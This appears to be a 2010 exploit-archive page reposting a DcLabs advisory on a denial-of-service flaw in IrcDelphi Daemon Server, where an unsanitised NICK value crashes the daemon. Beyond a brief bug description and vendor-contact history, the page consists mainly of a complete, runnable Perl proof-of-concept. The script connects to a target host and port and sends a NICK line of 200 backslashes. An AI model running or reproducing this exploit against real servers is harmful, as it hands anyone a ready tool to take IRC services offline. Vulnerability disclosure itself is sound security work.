Home / exploitsPDF  

IrcDelphi Daemon Server Denial of Service

Posted on 08 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IrcDelphi Daemon Server Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
IrcDelphi Daemon Server Denial of Service
=========================================


[Software]
- IrcDelphi Daemon Server
 
[Vendor Product Description]
- IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy
components. Easy to use and light irc daemon.
 
[Bug Description]
- The IRC Daemon does not sanitize the variable NICK correctly leading
to a Denial-of-Service flaw.
 
[History]
- Advisory sent to vendor on 06/21/2010.
- No response
- Public adv. 07/02/2010
 
[Impact]
- Low
 
[Affected Version]
- IrcDelphi core-alpha1
- Prior versions may also be vulnerable.
 
[Codes]
 
#!/usr/bin/perl
use IO::Socket;
 
       if (@ARGV &lt; 1) {
               usage();
       }
 
       $ip     = $ARGV[0];
       $port   = $ARGV[1];
 
       print &quot;[+] Sending request...
&quot;;
 
       $socket = IO::Socket::INET-&gt;new( Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt;
&quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;) || die &quot;[-] Connection FAIL
ED!
&quot;;
       print $socket &quot;USER AA AA AA :AA
&quot;;
       print $socket &quot;NICK &quot;. &quot;\&quot; x 200 .&quot;
&quot;;
 
       sleep(3);
       close($socket);
 
       print &quot;[+] Done!
&quot;;
 
 
sub usage() {
       print &quot;[-] Usage: &lt;&quot;. $0 .&quot;&gt; &lt;host&gt; &lt;port&gt;
&quot;;
       print &quot;[-] Example: &quot;. $0 .&quot; 127.0.0.1 6667
&quot;;
       exit;
}
---------------------------------------------------------------------------------
-------
 
DcLabs Security Group
Sponsor: ipax
ipax@dclabs.com.br
 
[Credits]
Crash and all DcLabs members.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :